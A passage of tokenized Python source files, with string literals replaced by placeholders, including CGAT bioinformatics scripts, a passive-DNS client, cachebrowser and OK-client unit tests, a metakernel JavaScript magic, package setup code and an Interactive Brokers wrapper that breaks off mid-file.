quality_threshold : <EOL> if is_negative : <EOL> p = rp <EOL> else : <EOL> p = fp <EOL> E . debug ( "<STR_LIT>" % <EOL> ( cluster_id , p , c , match . mSbjctId , match . strand , map_mali2genome . mapRowToCol ( fp ) , quality_scores [ y ] ) ) <EOL> if options . frame > <NUM_LIT:1> : <EOL> start = ( p // options . frame ) * options . frame <EOL> to_mask . extend ( list ( range ( start , start + options . frame ) ) ) <EOL> else : <EOL> to_mask . append ( p ) <EOL> regions = Iterators . group_by_distance ( sorted ( to_mask ) ) <EOL> for start , end in regions : <EOL> options . stdout . write ( "<STR_LIT>" % ( cluster_id , start , end ) ) <EOL> noutput += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" % ( ninput , noutput , nmissed ) ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import string <EOL> import os <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . Experiment as E <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . 
add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( create = None , <EOL> regex_token = None , <EOL> pattern_sub = "<STR_LIT:%s>" , <EOL> apply = None , <EOL> invert = False , <EOL> multiple = False , <EOL> columns_token = None , <EOL> filter = None , <EOL> reverse_filter = None , <EOL> inplace = False , <EOL> backup = False , <EOL> regex_rows = None , <EOL> echo = False , <EOL> extended = False , <EOL> keep = False , <EOL> keep_header = False ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . regex_token : <EOL> options . regex_token = re . compile ( options . regex_token ) <EOL> if options . regex_rows : <EOL> options . regex_rows = re . compile ( options . regex_rows ) <EOL> if options . columns_token : <EOL> if options . columns_token != "<STR_LIT:all>" : <EOL> options . columns_token = map ( <EOL> lambda x : int ( x ) - <NUM_LIT:1> , string . split ( options . columns_token , "<STR_LIT:U+002C>" ) ) <EOL> file_id = <NUM_LIT:0> <EOL> keys = { } <EOL> if options . apply : <EOL> infile = IOTools . openFile ( options . apply , "<STR_LIT:r>" ) <EOL> for line in infile : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" : <EOL> continue <EOL> d = line [ : - <NUM_LIT:1> ] . 
split ( "<STR_LIT:\t>" ) <EOL> try : <EOL> a , b = d [ : <NUM_LIT:2> ] <EOL> except ValueError : <EOL> print "<STR_LIT>" % line <EOL> continue <EOL> if options . invert : <EOL> a , b = b , a <EOL> if options . extended : <EOL> b = "<STR_LIT:\t>" . join ( d [ <NUM_LIT:0> ] + d [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> if options . extended : <EOL> b = "<STR_LIT:\t>" . join ( d [ <NUM_LIT:1> : ] ) <EOL> if not keys . has_key ( a ) : <EOL> keys [ a ] = [ ] <EOL> if options . keep : <EOL> b = a + "<STR_LIT:\t>" + b <EOL> keys [ a ] . append ( b ) <EOL> files = args <EOL> if not options . inplace and len ( args ) == <NUM_LIT:0> : <EOL> files = [ "<STR_LIT:->" ] <EOL> for file in files : <EOL> close_infile = False <EOL> close_outfile = False <EOL> if file == "<STR_LIT:->" : <EOL> infile = sys . stdin <EOL> outfile = sys . stdout <EOL> else : <EOL> if options . inplace : <EOL> os . rename ( file , file + "<STR_LIT>" ) <EOL> infile = IOTools . openFile ( file + "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> outfile = IOTools . openFile ( file , "<STR_LIT:w>" ) <EOL> close_infile = True <EOL> close_outfile = True <EOL> else : <EOL> infile = IOTools . openFile ( file , "<STR_LIT:r>" ) <EOL> outfile = sys . stdout <EOL> close_infile = True <EOL> first = True <EOL> for line in infile : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" : <EOL> outfile . write ( line ) <EOL> continue <EOL> if first : <EOL> first = False <EOL> if options . keep_header : <EOL> outfile . write ( line ) <EOL> continue <EOL> if options . regex_rows : <EOL> if options . regex_rows . search ( line ) : <EOL> outfile . write ( line ) <EOL> continue <EOL> new_lines = [ ] <EOL> if options . regex_token : <EOL> r = options . regex_token . search ( line [ : - <NUM_LIT:1> ] ) <EOL> while r : <EOL> key = r . group ( <NUM_LIT:1> ) <EOL> if key not in keys : <EOL> if options . create : <EOL> keys [ key ] = [ options . pattern_sub % str ( len ( keys ) ) ] <EOL> else : <EOL> new_lines . 
append ( line [ : - <NUM_LIT:1> ] ) <EOL> break <EOL> for k in keys [ key ] : <EOL> new_lines . append ( <EOL> line [ : r . start ( <NUM_LIT:1> ) ] + k + line [ r . end ( <NUM_LIT:1> ) : - <NUM_LIT:1> ] ) <EOL> if options . multiple : <EOL> r = options . regex_token . search ( line [ r . end ( <NUM_LIT:1> ) : - <NUM_LIT:1> ] ) <EOL> else : <EOL> break <EOL> else : <EOL> if not options . filter : <EOL> new_lines . append ( line [ : - <NUM_LIT:1> ] ) <EOL> elif options . columns_token : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if options . columns_token == "<STR_LIT:all>" : <EOL> columns = range ( len ( data ) ) <EOL> else : <EOL> columns = options . columns_token <EOL> keep = not options . reverse_filter <EOL> first_multiple = True <EOL> for c in columns : <EOL> k = data [ c ] <EOL> if k in keys : <EOL> if len ( keys [ k ] ) > <NUM_LIT:1> : <EOL> if not first_multiple : <EOL> raise "<STR_LIT>" % ( <EOL> k , line ) <EOL> first_multiple = False <EOL> for v in keys [ k ] : <EOL> if options . echo : <EOL> data . append ( data [ c ] ) <EOL> data [ c ] = v <EOL> if keep : <EOL> new_lines . append ( string . join ( data , "<STR_LIT:\t>" ) ) <EOL> keep = False <EOL> else : <EOL> if options . create : <EOL> keys [ k ] = [ options . pattern_sub % str ( len ( keys ) ) ] <EOL> data [ c ] = keys [ k ] [ <NUM_LIT:0> ] <EOL> elif options . filter : <EOL> keep = False <EOL> elif options . reverse_filter : <EOL> keep = True <EOL> if keep : <EOL> new_lines . append ( string . join ( data , "<STR_LIT:\t>" ) ) <EOL> elif options . apply : <EOL> for key in keys : <EOL> for k in keys [ key ] : <EOL> line = line . replace ( key , k ) <EOL> new_lines . append ( line [ : - <NUM_LIT:1> ] ) <EOL> if new_lines : <EOL> outfile . write ( string . join ( new_lines , "<STR_LIT:\n>" ) + "<STR_LIT:\n>" ) <EOL> if options . create : <EOL> create_file = IOTools . openFile ( options . 
create , "<STR_LIT:w>" ) <EOL> for key in keys : <EOL> for k in keys [ key ] : <EOL> create_file . write ( "<STR_LIT>" % ( key , str ( k ) ) ) <EOL> create_file . close ( ) <EOL> if close_outfile : <EOL> outfile . close ( ) <EOL> if close_infile : <EOL> infile . close ( ) <EOL> if options . inplace and not options . backup : <EOL> os . remove ( file + "<STR_LIT>" ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> import datetime <EOL> import json <EOL> import requests <EOL> try : <EOL> import requests_cache <EOL> HAS_CACHE = True <EOL> except ImportError : <EOL> HAS_CACHE = False <EOL> import logging <EOL> logger = logging <EOL> sort_choice = [ '<STR_LIT:count>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class PyPDNS ( object ) : <EOL> def __init__ ( self , url = '<STR_LIT>' , basic_auth = None , <EOL> auth_token = None , enable_cache = False , cache_expire_after = <NUM_LIT> , cache_file = '<STR_LIT>' ) : <EOL> self . url = url <EOL> if enable_cache and not HAS_CACHE : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . enable_cache = enable_cache <EOL> if enable_cache is True : <EOL> requests_cache . install_cache ( cache_file , backend = '<STR_LIT>' , expire_after = cache_expire_after ) <EOL> self . session = requests_cache . CachedSession ( ) <EOL> else : <EOL> self . session = requests . Session ( ) <EOL> if basic_auth is not None : <EOL> self . session . auth = basic_auth <EOL> elif auth_token is not None : <EOL> self . session . headers . update ( { '<STR_LIT>' : auth_token } ) <EOL> else : <EOL> pass <EOL> def query ( self , q , sort_by = '<STR_LIT>' ) : <EOL> logger . info ( "<STR_LIT>" , q ) <EOL> if sort_by not in sort_choice : <EOL> raise Exception ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( sort_choice ) ) <EOL> response = self . session . get ( '<STR_LIT>' . format ( self . url , q ) ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> to_return = [ ] <EOL> for l in response . text . split ( '<STR_LIT:\n>' ) : <EOL> if len ( l ) == <NUM_LIT:0> : <EOL> continue <EOL> try : <EOL> if self . enable_cache is True and response . from_cache is True : <EOL> logger . info ( "<STR_LIT>" , q ) <EOL> obj = json . loads ( l ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" , q ) <EOL> raise Exception ( '<STR_LIT>' + l ) <EOL> obj [ '<STR_LIT>' ] = datetime . datetime . 
fromtimestamp ( obj [ '<STR_LIT>' ] ) <EOL> obj [ '<STR_LIT>' ] = datetime . datetime . fromtimestamp ( obj [ '<STR_LIT>' ] ) <EOL> to_return . append ( obj ) <EOL> to_return = sorted ( to_return , key = lambda k : k [ sort_by ] ) <EOL> return to_return </s>
<s> import socket <EOL> from gevent import monkey <EOL> from cachebrowser . network import ConnectionHandler , HttpServer , HttpConnectionHandler <EOL> import unittest <EOL> from mock import Mock , patch <EOL> monkey . patch_all ( ) <EOL> class ServerTest ( unittest . TestCase ) : <EOL> def test_server ( self ) : <EOL> pass <EOL> def test_connection_handler ( self ) : <EOL> sock = Mock ( spec = socket . socket ) <EOL> sock . recv = Mock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> handler = ConnectionHandler ( ) <EOL> handler . on_connect = Mock ( ) <EOL> handler . on_data = Mock ( ) <EOL> handler . on_close = Mock ( ) <EOL> handler . on_error = Mock ( ) <EOL> handler . loop ( sock , '<STR_LIT>' ) <EOL> handler . on_connect . assert_called_once_with ( ) <EOL> handler . on_data . assert_called_once_with ( '<STR_LIT>' ) <EOL> handler . on_close . assert_called_once_with ( ) <EOL> handler . on_error . assert_not_called ( ) <EOL> sock . recv = Mock ( side_effect = socket . error ) <EOL> handler = ConnectionHandler ( ) <EOL> handler . on_error = Mock ( ) <EOL> handler . loop ( sock , '<STR_LIT>' ) <EOL> assert handler . on_error . called <EOL> class HttpServerTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> PORT = <NUM_LIT> <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . handler = HttpConnectionHandler ( ) <EOL> cls . server = HttpServer ( cls . PORT , handler = cls . handler ) <EOL> cls . server . start ( ) <EOL> def make_get ( self , path , query = None ) : <EOL> import urllib2 <EOL> request = '<STR_LIT>' % ( self . PORT , path ) <EOL> if query : <EOL> request = request + '<STR_LIT:?>' + query <EOL> urllib2 . urlopen ( request ) <EOL> def make_post ( self , path , data = None ) : <EOL> import urllib , urllib2 <EOL> if not data : <EOL> data = { } <EOL> encoded_data = urllib . urlencode ( data ) <EOL> request = '<STR_LIT>' % ( self . PORT , path ) <EOL> urllib2 . 
urlopen ( request , data = encoded_data ) <EOL> def test_get_no_param ( self ) : <EOL> path = '<STR_LIT>' <EOL> def on_request ( env , start ) : <EOL> self . assertEqual ( path . strip ( '<STR_LIT:/>' ) , env [ '<STR_LIT>' ] . strip ( '<STR_LIT:/>' ) ) <EOL> self . assertEqual ( '<STR_LIT:GET>' , env [ '<STR_LIT>' ] ) <EOL> start ( '<STR_LIT>' , [ ] ) <EOL> yield '<STR_LIT>' <EOL> self . handler . on_request = on_request <EOL> self . make_get ( path ) <EOL> def test_get_with_param ( self ) : <EOL> path = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> def on_request ( env , start ) : <EOL> self . assertEqual ( query , env [ '<STR_LIT>' ] ) <EOL> start ( '<STR_LIT>' , [ ] ) <EOL> yield '<STR_LIT>' <EOL> self . handler . on_request = on_request <EOL> self . make_get ( path , query ) </s>
<s> import importlib <EOL> import os <EOL> def load_module ( filepath ) : <EOL> module_name = path_to_module_string ( filepath ) <EOL> return importlib . import_module ( module_name ) <EOL> def path_to_module_string ( filepath ) : <EOL> filepath = filepath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> module_components = [ ] <EOL> while filepath : <EOL> filepath , component = os . path . split ( filepath ) <EOL> module_components . insert ( <NUM_LIT:0> , component ) <EOL> return '<STR_LIT:.>' . join ( module_components ) </s>
<s> test = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:code>' : r"""<STR_LIT>""" , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> } </s>
<s> from client . protocols import unlock <EOL> from client . utils import guidance <EOL> from client . sources . common import models <EOL> from client . utils import assess_id_util <EOL> import mock <EOL> import unittest <EOL> import os <EOL> class GuidanceProtocolTest ( unittest . TestCase ) : <EOL> GUIDANCE_DIRECTORY = "<STR_LIT>" <EOL> MISUCOUNT_FILE = "<STR_LIT>" <EOL> TEST = "<STR_LIT>" <EOL> CASE_ID = TEST + '<STR_LIT>' <EOL> UNIQUE_ID = "<STR_LIT>" <EOL> PROMPT = "<STR_LIT>" <EOL> ANSWER = [ "<STR_LIT>" ] <EOL> ANSWERMSG = [ "<STR_LIT>" ] <EOL> INPUT0 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:0>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT>' ] ] <EOL> TG0MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> INPUT1 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:1>' , '<STR_LIT:1>' ] , [ '<STR_LIT:1>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT:5>' ] ] <EOL> TG1MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> INPUT2 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:0>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT:0>' , '<STR_LIT:100>' ] , [ '<STR_LIT:4>' , '<STR_LIT>' , '<STR_LIT:0>' ] ] <EOL> TG2MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> ALLINPUTS = [ INPUT0 , INPUT1 , INPUT2 ] <EOL> ALLMSG = [ TG0MSG , TG1MSG , TG2MSG ] <EOL> def setUp ( self ) : <EOL> self . cmd_args = mock . Mock ( ) <EOL> self . assignment = mock . Mock ( ) <EOL> self . proto = unlock . protocol ( self . cmd_args , self . assignment ) <EOL> self . proto . guidance_util = guidance . Guidance ( self . GUIDANCE_DIRECTORY ) <EOL> self . proto . guidance_util . set_tg = self . mockSet_TG <EOL> self . proto . current_test = self . TEST <EOL> self . 
proto . _verify = self . mockVerify <EOL> self . proto . _input = self . mockInput <EOL> self . input_choices = [ ] <EOL> self . choice_number = <NUM_LIT:0> <EOL> def mockSet_TG ( self , access_token , guidance_flag ) : <EOL> return <NUM_LIT:1> <EOL> def mockInput ( self , prompt ) : <EOL> self . choice_number += <NUM_LIT:1> <EOL> return self . input_choices [ self . choice_number - <NUM_LIT:1> ] <EOL> def mockVerify ( self , guess , locked ) : <EOL> return guess == locked <EOL> def checkNumberOfAttempts ( self , number_of_attempts ) : <EOL> self . assertEqual ( number_of_attempts , len ( self . proto . analytics ) ) <EOL> def checkDictField ( self , dictionary , field , expected_value ) : <EOL> self . assertIn ( field , dictionary ) <EOL> self . assertEqual ( expected_value , dictionary [ field ] ) <EOL> def callsInteractError ( self , expected_error , answer , choices = None , unique_id = None , <EOL> case_id = None , prompt = None , randomize = True ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> if not choices : <EOL> choices = None <EOL> self . assertRaises ( expected_error , self . proto . interact , <EOL> unique_id , case_id , prompt , answer ) <EOL> def callsInteract ( self , expected , answer , choices = None , unique_id = None , <EOL> case_id = None , prompt = None , randomize = True ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> if not choices : <EOL> choices = None <EOL> self . assertEqual ( expected , self . proto . 
interact ( unique_id , case_id , <EOL> prompt , answer , choices = choices , randomize = randomize ) ) <EOL> def validateRecord ( self , record , answer , correct , prompt = None , <EOL> unique_id = None , case_id = None , guidance_msg = None ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> self . checkDictField ( record , '<STR_LIT>' , prompt ) <EOL> self . checkDictField ( record , '<STR_LIT>' , answer ) <EOL> self . checkDictField ( record , '<STR_LIT>' , correct ) <EOL> self . checkDictField ( record , '<STR_LIT:id>' , unique_id ) <EOL> self . checkDictField ( record , '<STR_LIT>' , case_id ) <EOL> self . checkDictField ( record , '<STR_LIT>' , guidance_msg ) <EOL> self . assertIn ( '<STR_LIT>' , record ) <EOL> self . assertIsInstance ( record [ '<STR_LIT>' ] , int ) <EOL> self . assertIn ( '<STR_LIT>' , record ) <EOL> self . assertIsInstance ( record [ '<STR_LIT>' ] , int ) <EOL> def testSingleLine_immediatelyCorrect ( self ) : <EOL> self . input_choices = self . ANSWER <EOL> self . callsInteract ( self . ANSWER , self . ANSWER ) <EOL> self . checkNumberOfAttempts ( <NUM_LIT:1> ) <EOL> attempt = self . proto . analytics [ <NUM_LIT:0> ] <EOL> self . validateRecord ( attempt , answer = self . ANSWER , correct = True , guidance_msg = self . ANSWERMSG [ <NUM_LIT:0> ] ) <EOL> def testAllTreatmentGroups ( self ) : <EOL> for tg in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> cur_input = self . ALLINPUTS [ tg ] <EOL> cur_expect_msg = self . ALLMSG [ tg ] <EOL> for x in range ( <NUM_LIT:0> , len ( cur_input ) ) : <EOL> self . setUp ( ) <EOL> self . proto . guidance_util . tg_id = tg <EOL> try : <EOL> os . remove ( self . GUIDANCE_DIRECTORY + self . MISUCOUNT_FILE ) <EOL> except : <EOL> pass <EOL> self . input_choices = cur_input [ x ] + self . ANSWER <EOL> self . callsInteract ( self . ANSWER , self . ANSWER ) <EOL> self . 
checkNumberOfAttempts ( len ( self . input_choices ) ) <EOL> attempt = self . proto . analytics [ <NUM_LIT:0> ] <EOL> for attempt_number , attempt in enumerate ( self . proto . analytics ) : <EOL> if attempt_number < len ( cur_input [ x ] ) : <EOL> self . validateRecord ( attempt , <EOL> answer = [ cur_input [ x ] [ attempt_number ] ] , <EOL> correct = False , guidance_msg = cur_expect_msg [ x ] [ attempt_number ] ) <EOL> else : <EOL> self . validateRecord ( attempt , <EOL> answer = self . ANSWER , <EOL> correct = True , guidance_msg = self . ANSWERMSG [ <NUM_LIT:0> ] ) </s>
<s> from metakernel import Magic <EOL> from IPython . display import Javascript <EOL> class JavascriptMagic ( Magic ) : <EOL> def line_javascript ( self , code ) : <EOL> """<STR_LIT>""" <EOL> jscode = Javascript ( code ) <EOL> self . kernel . Display ( jscode ) <EOL> def cell_javascript ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . code . strip ( ) : <EOL> jscode = Javascript ( self . code ) <EOL> self . kernel . Display ( jscode ) <EOL> self . evaluate = False <EOL> def register_magics ( kernel ) : <EOL> kernel . register_magics ( JavascriptMagic ) </s>
<s> from metakernel . tests . utils import ( get_kernel , get_log_text , <EOL> clear_log_text , EvalKernel ) <EOL> import re <EOL> import os <EOL> from metakernel . config import get_local_magics_dir <EOL> filename = get_local_magics_dir ( ) + os . sep + "<STR_LIT>" <EOL> def test_install_magic_magic ( ) : <EOL> kernel = get_kernel ( EvalKernel ) <EOL> kernel . do_execute ( "<STR_LIT>" ) <EOL> text = get_log_text ( kernel ) <EOL> assert re . match ( "<STR_LIT>" , text , re . DOTALL | re . M ) , "<STR_LIT>" <EOL> assert os . path . isfile ( filename ) , ( "<STR_LIT>" % filename ) <EOL> def teardown ( ) : <EOL> os . remove ( filename ) </s>
<s> print ( list ( range ( <NUM_LIT:100> ) ) ) </s>
<s> from . estimation import KaplanMeierFitter , NelsonAalenFitter , AalenAdditiveFitter , BreslowFlemingHarringtonFitter , CoxPHFitter , WeibullFitter , ExponentialFitter <EOL> import lifelines . datasets <EOL> from . version import __version__ <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import os <EOL> from distutils . core import setup <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . read ( ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> license = "<STR_LIT>" , <EOL> keywords = '<STR_LIT>' , <EOL> package_data = { <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> } , <EOL> ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import logging as logger <EOL> import types <EOL> from ib . ext . EWrapper import EWrapper <EOL> from ib . client . Portfolio import Account , AccountMessage , PortfolioMessage <EOL> from ib . client . Queries import Contracts , Executions <EOL> def showmessage ( message , mapping ) : <EOL> try : <EOL> del ( mapping [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ) : <EOL> pass <EOL> items = mapping . items ( ) <EOL> items . sort ( ) <EOL> print '<STR_LIT>' % ( message , ) <EOL> for k , v in items : <EOL> print '<STR_LIT>' % ( k , v ) <EOL> class Observable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . listeners = { } <EOL> self . logger = logger . getLogger ( ) <EOL> def register ( self , listener , events = None ) : <EOL> """<STR_LIT>""" <EOL> if events is not None and type ( events ) not in ( types . TupleType , types . ListType ) : <EOL> events = ( events , ) <EOL> self . listeners [ listener ] = events <EOL> def dispatch ( self , event = None , msg = None ) : <EOL> """<STR_LIT>""" <EOL> for listener , events in self . listeners . items ( ) : <EOL> if events is None or event is None or event in events : <EOL> try : <EOL> listener ( self , event , msg ) <EOL> except ( Exception , ) : <EOL> self . unregister ( listener ) <EOL> errmsg = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( listener . func_name , event ) <EOL> self . logger . exception ( errmsg ) <EOL> def unregister ( self , listener ) : <EOL> """<STR_LIT>""" <EOL> del self . listeners [ listener ] <EOL> class SyncWrapper ( EWrapper , Observable ) : <EOL> suppress = False <EOL> emitter = [ ] <EOL> account = Account ( ) <EOL> contracts = Contracts ( ) <EOL> executions = Executions ( ) <EOL> order_messages = [ ] <EOL> ref_id = None <EOL> order_id = <NUM_LIT> <EOL> def __init__ ( self , subs = { } ) : <EOL> super ( SyncWrapper , self ) . __init__ ( ) <EOL> self . 
subscriptions = subs <EOL> def accountDownloadEnd ( self , accountName ) : <EOL> msg = { '<STR_LIT>' : accountName } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def bondContractDetails ( self , reqId , contractDetails ) : <EOL> self . contracts . append ( reqId , contractDetails ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def commissionReport ( self , commissionReport ) : <EOL> msg = { '<STR_LIT>' : commissionReport } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def connectionClosed ( self ) : <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def contractDetails ( self , reqId , contractDetails ) : <EOL> self . contracts . append ( reqId , contractDetails ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def contractDetailsEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def currentTime ( self , time ) : <EOL> msg = { '<STR_LIT:time>' : time } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def deltaNeutralValidation ( self , reqId , underComp ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : underComp } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error_0 ( self , strval ) : <EOL> msg = { '<STR_LIT>' : strval } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error_1 ( self , id , errorCode , errorMsg ) : <EOL> msg = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT>' : errorCode , <EOL> '<STR_LIT>' : errorMsg } <EOL> if self . 
